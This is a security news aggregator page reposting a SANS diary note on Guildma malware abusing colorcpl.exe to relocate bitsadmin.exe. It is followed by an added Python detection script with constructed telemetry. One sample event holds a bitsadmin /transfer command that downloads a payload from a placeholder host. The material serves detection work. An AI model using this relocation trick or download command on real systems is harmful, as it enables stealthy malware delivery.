Welcome to our Cyber Security News Aggregator.

Cyber Tzar provides a cyber security risk management platform, including automated penetration tests and risk assessments culminating in a "cyber risk score" out of 1,000, just like a credit score.

Guildma is now abusing colorcpl.exe LOLBIN, (Fri, May 5th)

published on 2023-05-05 17:00:59 UTC by
Content:
While analyzing a Guildma (AKA Astaroth) sample recently uploaded to MalwareBazaar [1], we came across a chain of LOLBIN abuse. It is not uncommon to see malicious code using the LOLBIN ‘bitsadmin.exe’ to download artifacts from the Internet. However, what is interesting in this case is that Guildma first copies ‘bitsadmin.exe’ to a less suspect path using ‘colorcpl.exe’, another LOLBIN, before executing it. 
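The chain described above (colorcpl.exe used to relocate bitsadmin.exe, then the relocated copy executed) gives a defender two observable anomalies in process-creation telemetry. The following detection sketch is an added example, not code from the SANS diary or from Cyber Tzar; it assumes Sysmon-style event fields (Image, CommandLine, ParentImage, OriginalFileName), and the sample events, the destination directory and the renamed file name "btsa.exe" are constructed for illustration. It goes slightly beyond the diary's specific case by flagging colorcpl.exe whenever its command line names any other executable, and by using the PE OriginalFileName field so a renamed copy of bitsadmin.exe is still recognised.

```python
import re
from pathlib import PureWindowsPath

# Directories where bitsadmin.exe legitimately lives (assumption: default Windows install).
EXPECTED_BITSADMIN_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Matches a bare or fully qualified *.exe token inside a command line.
EXE_ARG = re.compile(r"[\w\\:.\-]+\.exe", re.IGNORECASE)


def analyze_event(event):
    """Return a list of finding strings for one process-creation event (empty if nothing odd)."""
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    original = event.get("OriginalFileName", "").lower()
    path = PureWindowsPath(image)
    name = path.name.lower()
    parent_dir = str(path.parent).lower()
    findings = []

    # 1. colorcpl.exe is the colour-management control panel; a command line that names
    #    another executable (bitsadmin.exe in the Guildma sample) is not normal use.
    if name == "colorcpl.exe":
        others = [
            tok for tok in EXE_ARG.findall(cmdline)
            if PureWindowsPath(tok).name.lower() != "colorcpl.exe"
        ]
        if others:
            findings.append(
                "colorcpl.exe invoked with executable argument(s): " + ", ".join(others)
            )

    # 2. bitsadmin.exe, identified by file name or by PE OriginalFileName (which survives
    #    a rename), running outside its expected directories points to a relocated copy.
    is_bitsadmin = name == "bitsadmin.exe" or original == "bitsadmin.exe"
    if is_bitsadmin and parent_dir not in EXPECTED_BITSADMIN_DIRS:
        findings.append("bitsadmin.exe executing from unexpected path: " + image)

    return findings


def scan(events):
    """Return (index, findings) pairs for every event that produced at least one finding."""
    results = []
    for i, event in enumerate(events):
        findings = analyze_event(event)
        if findings:
            results.append((i, findings))
    return results


# Constructed sample telemetry (hypothetical values, not taken from the Guildma sample).
SAMPLE_EVENTS = [
    {   # ordinary launch of the colour-management control panel
        "Image": r"C:\Windows\System32\colorcpl.exe",
        "CommandLine": r'"C:\Windows\System32\colorcpl.exe"',
        "ParentImage": r"C:\Windows\explorer.exe",
        "OriginalFileName": "colorcpl.exe",
    },
    {   # constructed: colorcpl.exe handed bitsadmin.exe plus a destination path
        "Image": r"C:\Windows\System32\colorcpl.exe",
        "CommandLine": r"colorcpl.exe C:\Windows\System32\bitsadmin.exe C:\Users\Public\Libraries\btsa.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "colorcpl.exe",
    },
    {   # constructed: the relocated, renamed copy runs; OriginalFileName still says bitsadmin.exe
        "Image": r"C:\Users\Public\Libraries\btsa.exe",
        "CommandLine": r"btsa.exe /transfer dl http://example.invalid/p C:\Users\Public\p.bin",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "bitsadmin.exe",
    },
    {   # legitimate bitsadmin.exe from System32
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "CommandLine": r"bitsadmin.exe /list",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "bitsadmin.exe",
    },
]


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        for finding in findings:
            print(f"event {index}: {finding}")
```

The two rules are deliberately independent: the first fires at the copy step even if the destination name is unknown, and the second fires at execution even if the copy step was missed, so either half of the chain is enough to raise an alert.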
Article: Guildma is now abusing colorcpl.exe LOLBIN, (Fri, May 5th) - published over 1 year ago.

https://isc.sans.edu/diary/rss/29814
Published: 2023 05 05 17:00:59
Received: 2023 05 05 17:34:40
Feed: SANS Internet Storm Center, InfoCON: green
Source: SANS Internet Storm Center, InfoCON: green
Category: Alerts
Topic: Vulnerabilities
Views: 0
